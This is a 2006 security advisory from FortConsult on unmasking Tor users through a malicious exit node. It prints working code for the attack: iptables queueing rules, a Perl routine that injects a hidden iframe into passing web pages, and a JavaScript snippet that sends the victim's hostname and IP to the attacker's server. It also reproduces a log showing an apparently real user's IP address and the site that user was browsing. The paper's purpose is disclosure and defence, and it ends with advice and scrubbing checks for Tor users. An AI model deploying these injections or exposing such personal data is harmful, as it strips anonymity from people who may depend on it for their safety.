
Practical Onion Hacking:

Finding the real address of Tor clients


October 2006
Written October 2006 by FortConsult's Security Research Team/Andrew Christensen
October 2006, Page 2, Copyright FortConsult, www.fortconsult.net

Copyright and Disclaimer
The information in this advisory is Copyright 2006 FortConsult A/S. It is provided so that our
customers and others understand the risk they may be facing by running affected software on
their systems.
In case you wish to copy information from this advisory, you must either copy all of it or refer to
this document (including our URL).
No guarantee / warranty is provided for the accuracy of this information, or against damage you
may cause your systems in testing.
The Security Research Team
This advisory has been discovered by FortConsult's Security Research Team/Andrew
Christensen.
FortConsult is a specialist in technical services within the field of IT security. We are vulnerability
experts that help business enterprises to protect themselves against the numerous security
threats that exist today - both as impartial consultants and with responsibility for specific tasks.
Our primary services are security tests and practically-oriented security consultancy.
For more information: www.fortconsult.net.

Table of Contents
The Security Research Team
Introduction
  Why we are looking at this
  What this paper shows
  How we did it
What happens when somebody was revealed
How tagging / injection is accomplished
  Before anything else: we need a Tor node running
  First: QUEUE interesting data
  Second, altering and re-injecting the data with pointer to MyEvilWebServer
  Third, Give "phonehome" HTML payload to VictimHost from MyEvilWebServer
  Fourth, wait for results
The Results: approximately 100 unmasked in a day
  Flash Object Results
  Flash Result Example
  Javascript Results
  DNS client-tagging results
Conclusions
  Conclusions for people using Tor
Screenshot of Injection Platform




Introduction
TOR, "The Onion Router", is a Peer-to-Peer anonymity network. All users forward each other's
traffic, resulting in the data being so jumbled around on the network that it's very difficult to
follow. This paper describes ways to find who's using Tor, even when the data has been
bounced all around the globe, and even if you don't have your own private Echelon to make use
of.
Why we are looking at this
This paper isn't being written because we think Tor is a bad thing. Despite the fact that we
watched Tor being used to access Al-Qaeda video sites and child porn during writing this article,
we also observed it being used to access Amnesty International - in other words, political speech
sites that are known to be on (for example) Saudi Arabian and Chinese filter lists
(http://www.opennetinitiative.net/studies/saudi/). Given that, the many good uses of Tor may
outweigh the many bad uses; we pass no judgment on Tor itself. As Tor's creators have said
before: the bad guys already have anonymity anyways.
To be honest, we wrote this paper simply because it's an interesting problem, both from the
perspective of how to best make a useable P2P anonymity network, as well as the perspective of
how to break one.
What this paper shows
This paper is a follow-up to our first Tor paper, "Peeling the Onion". Our first paper suggested a
number of techniques for revealing the true IP of Tor clients, but didn't present full code to
actually accomplish them. This paper demonstrates working, practical techniques for injecting
bugs into Tor traffic that result in the client revealing itself.
Clearly Tor's designers have done a pretty good job: I couldn't find any weaknesses in Tor itself
that violate the tenets set out at http://tor.eff.org (basically that end-to-end traffic-analysis is
always possible, but the traffic analysis should be difficult to everything but a global Echelon).
So instead, I attacked the data which Tor carries the most of: web traffic.
This paper shows that if you either run a Tor exit node or a website, it is quite simple to place a
web bug in the web traffic going through Tor. This web bug results in the client "phoning home" to
a "who am I really" demasking node.
How we did it
Rather than attempting to exploit weaknesses in Tor, we make use of technology that 99% of the
people browsing the web will have enabled: Javascript and Flash. There are two techniques that
we used:
1. Causing a web-browser using Tor to "phone home", outside the Tor network
2. Causing a web-browser using Tor to "phone home", inside the Tor network, and deliver
uniquely-identifying information about the client, such as the computer's hostname and IP address
In practice, the first technique ("phone home" outside Tor) proved very reliable, whereas the
"inside Tor" identifier technique failed pretty much completely.

What happens when somebody was revealed
The following sequence of events occurs when somebody is unmasked:
1. VictimHost connects through MyTorNode, to SomeWebSite
2. MyTorNode changes outbound traffic to SomeWebSite so that HTTP1.0 and gzip
compression are not used (HTTP headers are stripped / changed)
3. MyTorNode replaces inbound traffic from SomeWebSite, inserting an <iframe> reference
to MyEvilWebServer. This reference also contains a recognizable Cookie
4. MyEvilWebServer receives request via Tor from VictimHost, including Cookie, serves up
Trigger. Trigger contains:
   - Javascript code that requests "/VictimHostName_VictimHostIP.gif" from
     MyEvilWebServer
   - A Shockwave Flash Movie that makes a direct connection to MyEvilWebServer
     (since Flash doesn't support / know about Tor / proxies / etc, this will be a direct
     connection)
5. Javascript executing on VictimHost makes VictimHost connect via Tor and request
/VictimHostName_VictimHostIP.gif
6. Shockwave Flash executing on VictimHost connects directly, without Tor, and resends
the Cookie, allowing mapping between the original page being browsed via Tor, and the
real VictimHostIP


[Diagram 1 - Overview of Tor Injection Net. Label recovered from the figure: "Web request from VictimHost via Tor: HTTP/1.0, no GZIP, Connection: close"]

How tagging / injection is accomplished
In order to accomplish all this, Linux ipfilter QUEUE target was used (QUEUE is now deprecated,
but we chose to continue using it as we have no need for more than one QUEUE, and as we
didn't have time yet to rewrite the Perl QUEUE handling module which can be found on
http://www.cpan.org).
Before anything else: we need a Tor node running
Before going any farther, we obviously need a Tor node running. This was set up, and the
fingerprint was sent to the Tor ops, in order to make our evil Echelon node look a little more
trustworthy to clients. Finally, we modified torrc to allow only interesting traffic to transit our Tor
node:

# I dont want people connecting back into Tor, from my Tor node
ExitPolicy reject 127.0.0.0/8:*

# block filetrading sites rapidshare.de and up-file.com
# it is no fun having all bandwidth wasted on CSI episodes
ExitPolicy reject 80.239.236.0/24:*
ExitPolicy reject 130.117.156.0/24:*
ExitPolicy reject 69.31.34.0/24:*

# block porn sites using all bandwidth, one example shown below
ExitPolicy reject 146.82.200.248:*

# Crap... observed people looking at childporn
# (nakedlola.com, young-sweet-girls.com)
ExitPolicy reject 81.95.147.0/24:*
ExitPolicy reject 194.182.148.0/24:*

# allow snarfable traffic, reject everything else
ExitPolicy accept *:80
ExitPolicy reject *:*
First: QUEUE interesting data
Basically, we use iptables to QUEUE the following traffic:
1. All outbound packets destined to port 80 which are not going to another Tor node
2. All inbound traffic originating from port 80, and not from another Tor node
The following code ("iptables-exclude-tornode") is used to accomplish this:
echo Saving old ruleset to iptables.bak
iptables-save > iptables.bak
echo Flushing old ruleset
iptables --flush
echo Allowing traffic related to Tor nodes
# field 3 of each "router" line in the cached directory is that node's address
for tornode in `cat /var/lib/tor/cached-directory | grep '^router ' | awk '{print $3}' | sort | uniq`; do
  echo -e "Allowing traffic to Tornode $tornode \r"
  iptables -I INPUT -p tcp -m tcp --sport 80 -s $tornode -j ACCEPT
  iptables -I OUTPUT -p tcp -m tcp --dport 80 -d $tornode -j ACCEPT
done
echo Done allowing Tor nodes traffic
echo Allowing traffic to/from our evil webserver
iptables -A INPUT -d 11.22.111.222 -p tcp -m tcp --dport 80 -j ACCEPT
iptables -A OUTPUT -s 11.22.111.222 -o eth0 -p tcp -m tcp --sport 80 -j ACCEPT
echo Allowing re-injected traffic
iptables -A OUTPUT -o lo -j ACCEPT
iptables -A INPUT -i lo -j ACCEPT
iptables -A OUTPUT -p tcp -m tos --tos Minimize-Cost -j ACCEPT
iptables -A OUTPUT -p tcp -m ttl --ttl-eq 255 -j ACCEPT
echo QUEUEing victims
iptables -A INPUT -i eth0 -p tcp -m tcp --sport 80 -j QUEUE
iptables -A OUTPUT -p tcp -m tcp --dport 80 -m owner --uid-owner debian-tor -j QUEUE
Second, altering and re-injecting the data with pointer to MyEvilWebServer
With the interesting traffic QUEUE'd, the next step is to find the data, change anything we need
to in it, and then reinject the packet. To avoid both the original and modified packets both going
out the wire, we NF_DROP the original packet, and then create and inject a raw packet based on
the original but with our modifications.
The following code excerpt performs these modifications, and used two Perl modules, one to
receive the QUEUE data, and one to re-inject it. These modules are:

1. use IPTables::IPv4::IPQueue qw(:constants);
2. use Net::RawIP;

(Note that the injected tag is "<iframe height=1 src=http://xxx.dk/IPTAGHEX.r />", where
IPTAGHEX will be replaced on the fly with the IP of SomeWebServer).

# alter traffic destined to port 80
# make traffic easier to watch, http 1.0 and no gzip
if($portdest == 80){
    if(($tcpdata =~ m/Accept-Encoding/mgs)
       or ($tcpdata =~ m/HTTP\/1.1/)){
        $tcpdata =~ s/Accept-Encoding: /Fuzzzzy-Animals: /g;
        $tcpdata =~ s/HTTP\/1.1/HTTP\/1.0/g;
    }
}

# alter traffic returned from port 80
# HTTP traffic -- inject tracers and anonymize a little
if($portsrc == 80){
    if($tcpdata =~ m/$routerip/gsmi){
        # replace tags from myip.dk, etc, with filthy untruths:
        $tcpdata =~ s/$routerip/$fakeIP/gsm;
    }
    #inject tracer at specified part of page
    if($tcpdata =~ m/$placetag/mgsi){
        $tracer = $tracertemplate;
        my $hexip = &ipHexEncode($src);
        $tracer =~ s/IPTAGHEX/$hexip/gsm;
        if($prepost eq $posttag){
            $tcpdata =~s/$placetag.{$tracerlength}/$placetag$tracer/gsmi;
        }
        else{
            $tcpdata =~s/.{$tracerlength}$placetag/$tracer$placetag/gsmi;
        }
    }
}
Third, Give "phonehome" HTML payload to VictimHost from MyEvilWebServer
At this point, VictimHost may have been induced to browse to the evil website at MyEvilWebsite.
MyEvilWebsite will return an HTML page containing the following elements:
1. An image reference for a 1x1 pixel gif image, named http://COOKIE.x.xxx.dk/x.gif
2. A ShockwaveFlash movie that connects to MyEvilWebServer port 8080
3. Javascript that determines the IP and hostname of the machine it executes on, and then
sends this data to MyEvilWebsite via a GET request.
Fourth, wait for results
If we are lucky, the VictimClient will now connect inside Tor and request
/VictimClientName_VictimClientIP.gif, and / or will phone home (outside of Tor) to our second
listening server on port 8080 (the port was picked somewhat at random out of other reasonable
choices, but since many people also use proxychains together with Tor, we chose to use a
common proxy port) and deliver an identifiable cookie.
DNS client unmasking
The point of the first of these elements, the gif image, is that the browser may perform a local
nslookup for COOKIE.x.xxx.dk, rather than letting Tor resolve this name. If this occurs, the
request will go to the nameserver for the x.xxx.dk domain, which is coincidentally set to the IP of
MyEvilWebServer. If we are lucky, this may show either the IP of the client, or at least show what
ISP they are using.

Example of image tag:
<img src=http://DEADBEEF.x.xxx.dk/x.gif height=1 width=1>
Note that this technique relies fully on Tor not being used as recommended - but from our
standpoint, a misconfiguration is just as good as any other problem.
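
The two injected elements shown so far, the <iframe> tracer and the <img> tag with a token in its host name, are what an HTML scrubber in front of the browser has to catch. The Python check below is an added example, not code from the original paper; the sample page, the hosts example.org and cdn.example.net, and the two heuristics (a height or width of 0 or 1, a hex-like leading host label) are assumptions made for illustration.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Elements that make the browser fetch a URL as soon as the page renders.
FETCHING_TAGS = {"iframe", "img", "embed", "object"}
TINY = re.compile(r"^\s*[01]\s*(px)?\s*$", re.I)    # height/width of 0 or 1
TOKEN_LABEL = re.compile(r"^[0-9a-f]{8,}$", re.I)   # e.g. DEADBEEF


class TracerScanner(HTMLParser):
    """Collect third-party embeds that look like per-visitor tracers."""

    def __init__(self, page_host):
        super().__init__()
        self.page_host = page_host.lower()
        self.findings = []

    def _is_first_party(self, host):
        return host == self.page_host or host.endswith("." + self.page_host)

    def handle_starttag(self, tag, attrs):
        if tag not in FETCHING_TAGS:
            return
        attr = {name: (value or "") for name, value in attrs}
        url = attr.get("src") or attr.get("data") or ""
        host = urlparse(url).hostname or ""   # hostname is lower-cased
        if not host or self._is_first_party(host):
            return
        reasons = []
        if any(TINY.match(attr.get(dim, "")) for dim in ("height", "width")):
            reasons.append("invisible")
        if TOKEN_LABEL.match(host.split(".")[0]):
            reasons.append("token-hostname")
        if reasons:
            self.findings.append((tag, host, reasons))


def scan(html, page_host):
    """Return [(tag, host, reasons)] for suspicious embeds in one page."""
    scanner = TracerScanner(page_host)
    scanner.feed(html)
    scanner.close()
    return scanner.findings


# Constructed sample: a page served by example.org that picked up two
# foreign elements in transit, written in the same form as the paper's tags.
SAMPLE = """<html><body>
<img src="http://example.org/logo.gif" height=1 width=1>
<img src="http://cdn.example.net/banner.png" height=60 width=468>
<iframe height=1 src=http://xxx.dk/0a000001 />
<img src=http://DEADBEEF.x.xxx.dk/x.gif height=1 width=1>
</body></html>"""

if __name__ == "__main__":
    for tag, host, reasons in scan(SAMPLE, "example.org"):
        print(tag, host, ",".join(reasons))
```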
ShockwaveFlash Phonehome Unmasking
Using a technique described at http://dev.dschini.org/socketjs/, we cause any client which allows
/ supports ShockwaveFlash movies (.swf files) to be rendered, to download our own flash movie
which basically just connects to MyEvilWebserver:8080.
We had theorized about using this technique in our first Tor paper - here we show that it works.
To abuse this, we generate an HTML page on the fly which has the Cookie value previously
generated, and cause the Shockwave object which the VictimClient will also receive, to transmit
this Cookie value back in to our server.
Code is not reproduced here, as it is basically identical to the socketjs URL shown above.
Javascript "here's who I am code"
This is a "Firefox-only" attack that we first saw demonstrated at
http://stud1.tuwien.ac.at/~e912518/javas/jhostip.html. Sadly (for us, anyways) this technique
doesn't seem to work very well anymore. It worked nicely when we wrote our first Tor paper, but
apparently some of the recent changes to Firefox made it stop working.
Basically, we used Mozilla's Javascript rendering to resolve the localhost name and IP, stick this
in a variable, and then make a request to MyEvilWebserver using the IP / name found:
<script language=JavaScript>
a = java.net.InetAddress.getLocalHost();
i = a.getHostName();
n = a.getHostAddress();
img = "http://xxx.dk /" + i + n + ".gif";
document.write("<img height=0 width=0 src=" + img + ">");
</script>
The Results: approximately 100 unmasked in a day
Flash Object Results
The results showed that the Flash object "out of Tor" technique worked by far the best.
Running the injection platform for a day, we were able to positively identify 8 "true" IPs, one of
which we saw persuaded to connect to our phonehome server 81 times.
We observed that Chinese browsers were most likely to be unmasked by use. We don't know if
this is simply proportional to who is using Tor, or is a result of "popular" browser types / settings
in China. However, there are some larger ramifications to this, since Tor's proponents claim that
China is one of the countries which needs Tor the most to boost democratic speech.
We think this technique could be much more successful, if instead of using a Javascript/Flash
combination, we just use "plain" flash with a hardcoded "phonehome" IP address and value, and
inject this directly instead of injecting it inside of an <iframe>. This is because Privoxy will have
too easy a time filtering out dodgy-looking <iframe> tags, and some people may have Javascript
disabled, but may still allow Flash to display. We didn't do this basically because we had no
desire to purchase the Flash authoring tool.
Flash Result Example
An example of some of the results we obtained on our phonehome server:
cat phonehome.87.237.113.19 Wed Oct 4 03:12:33 2006.log:
87.237.113.19 Wed Oct 4 03:12:33 2006 Full Data: Browser to:
http://warezok.ru/forum/index.php?__83.222.30.78(Firefox) Cookie:
ufhrcegndvb
This shows:
- The client's real IP: 87.237.113.19
- The time of connection (UTC): October 4th 2006 at 3:12 in the morning
- The type of client (based on the User-Agent): Firefox
- The site the client was browsing to when we first tagged them:
  (http://warezok.ru/forum/index.php?)
- The IP of the site the client was browsing to, as recorded based on the cookie value:
  83.222.30.78
- The Cookie value that we have initially packet-injected. The client has passed this value
  back to MyEvilWebServer in a GET request, and then sent it via the Flash socket
  connection as well - tying everything together: ufhrcegndvb
Javascript Results
The Javascript injection technique was not very successful. We didn't find a single real IP, and
only got a few valid hostnames out of the exercise, none of which is unique enough to be
identifiable. In particular, "ubuntu" and "KanotixBox" both just indicate the name of the Operating
System being used ("KanotixBox" indicates that a linux LiveCD is being used). "eureka" is
obviously not very unique either.
cat log_server.log |grep 'GET /.*gif'|sort|uniq
GET /eureka127.0.0.1.gif HTTP/1.1
GET /KanotixBox127.0.0.1.gif HTTP/1.1
GET /localhost127.0.0.1.gif HTTP/1.0
GET /localhost127.0.0.1.gif HTTP/1.1
GET /ubuntu127.0.0.1.gif HTTP/1.0
DNS client-tagging results
We haven't monitored this, so there are no results.
Conclusions
We have NOT found any weaknesses in Tor - but instead demonstrated that weaknesses /
features of the software that uses Tor can be exploited to take away people's privacy /
anonymity.
We believe we have demonstrated that it is entirely possible (even practical and easy) to unmask
a good portion of the traffic transiting Tor, since it is being viewed using Firefox and Internet
Explorer, and is transmitted cleartext.
We also believe that it may be possible, by tagging and identifying cleartext traffic and learning
about the software used on a given client, to "validate" encrypted traffic, at least part of the time.
This could be done by building a database of the SSL properties of different versions of for
example Windows or Linux, and mapping these properties to the software versions announced in
cleartext traffic.
Conclusions for people using Tor
We fully expect (and perhaps hope) that this paper will help improve the scrubbers (like privoxy)
that support Tor and similar projects [1].
What we have shown here is absolutely not foolproof. If a person wanted to be anonymous, the
simplest techniques to defeat what we have shown here are:
1. Turning off Flash, ActiveX, Java, Javascript, and pretty much everything else that makes
websites exciting to marketing and sales people [2]
   a. You may also want to avoid watching movies or streaming audio.
2. Ensuring Tor resolves name addresses (use Privoxy Socks4a)
3. Use SSL, as it's (even with self-signed certs) at least a lot harder to manipulate the traffic
without being detected (and with a proper certificate almost impossible).
4. Using Lynx or other text-based browsers when possible.

[1] Just as a small footnote: personally, if I were going to design a good onion routing network, I might opt to go for
default-routed VPN to NATbox technology, instead of what is essentially proxy technology.

[2] Unfortunately, normal sites like Yahoo, Google, YouTube, etc., will break when you turn all this off. This is why
most people have Flash, etc., enabled, and why it was possible to disclose so many people's true IP addresses.
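
One way to check item 2 of the list above, as an added example that is not part of the original paper: the Python audit below reads a Privoxy configuration and reports whether host names are resolved locally (the behaviour the DNS unmasking technique depends on) or handed to the SOCKS proxy. The directive names are Privoxy's own; the two configurations, the listen address and the SOCKS port 127.0.0.1:9050 are constructed samples.

```python
# How each Privoxy forwarding directive treats the target host name:
# forward-socks4 resolves it with the local DNS client, the others pass
# the name on to the SOCKS proxy (here: Tor) for resolution.
SOCKS_LOCAL_DNS = {"forward-socks4"}
SOCKS_REMOTE_DNS = {"forward-socks4a", "forward-socks5", "forward-socks5t"}


def audit_forwarding(config_text):
    """Return [(line_no, directive, pattern, verdict)] per forwarding rule."""
    results = []
    for line_no, raw in enumerate(config_text.splitlines(), 1):
        fields = raw.split("#", 1)[0].split()   # drop comments, tokenize
        if len(fields) < 3:
            continue
        directive, pattern, next_hop = fields[0], fields[1], fields[2]
        if directive in SOCKS_LOCAL_DNS:
            verdict = "LEAK"          # name lookup leaves the machine directly
        elif directive in SOCKS_REMOTE_DNS:
            verdict = "OK"            # name lookup happens behind the proxy
        elif directive == "forward":
            # "." as parent means: no proxy, connect directly
            verdict = "DIRECT" if next_hop == "." else "HTTP-PARENT"
        else:
            continue                  # e.g. forwarded-connect-retries
        results.append((line_no, directive, pattern, verdict))
    return results


def default_route_verdict(config_text):
    """Verdict for the catch-all pattern "/"; the last matching rule wins."""
    verdict = "DIRECT"   # no rule for "/" means Privoxy connects directly
    for _, _, pattern, rule_verdict in audit_forwarding(config_text):
        if pattern == "/":
            verdict = rule_verdict
    return verdict


# Constructed sample: Privoxy chained to a local Tor SOCKS port, weak form.
WEAK_CONFIG = """# constructed sample
listen-address 127.0.0.1:8118
forward-socks4 / 127.0.0.1:9050 .
forwarded-connect-retries 1
"""

# Constructed sample: the same setup with name resolution left to Tor.
FIXED_CONFIG = """# constructed sample
listen-address 127.0.0.1:8118
forward-socks4a / 127.0.0.1:9050 .
forward 192.168.*.*/ .
"""

if __name__ == "__main__":
    for name, cfg in (("weak", WEAK_CONFIG), ("fixed", FIXED_CONFIG)):
        print(name, default_route_verdict(cfg), audit_forwarding(cfg))
```

A "DIRECT" rule for a narrower pattern, such as the LAN exception in the second sample, still sends matching requests outside Tor and should be reviewed on its own.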

Screenshot of Injection Platform
This picture shows what the injection platform looked like when running.
Top left window: Rewriting of HTML packets going from MyTorNode to websites on the Internet,
to include <iframe> reference (on returned packets from webservers) and to remove the "Accept-
Encoding: gzip" header (on outbound packets to webservers).
The places it says "ANONYMIZING (22.33.111.555)", MyTorNode IP address was detected in
the packet, for example as a result of someone visiting whatismyip.com. I replaced my own IP
with obvious garbage (this does not apply to traffic to Tor dirservers, for obvious reasons).
Middle left window: The phonehome server, receiving connections from the Flash socket
connector.
Bottom left window: MyEvilWebserver serving up the flash socket and HTML page with DNS,
Javascript triggers.
Right column window: directory listing of the phonehome log directory.
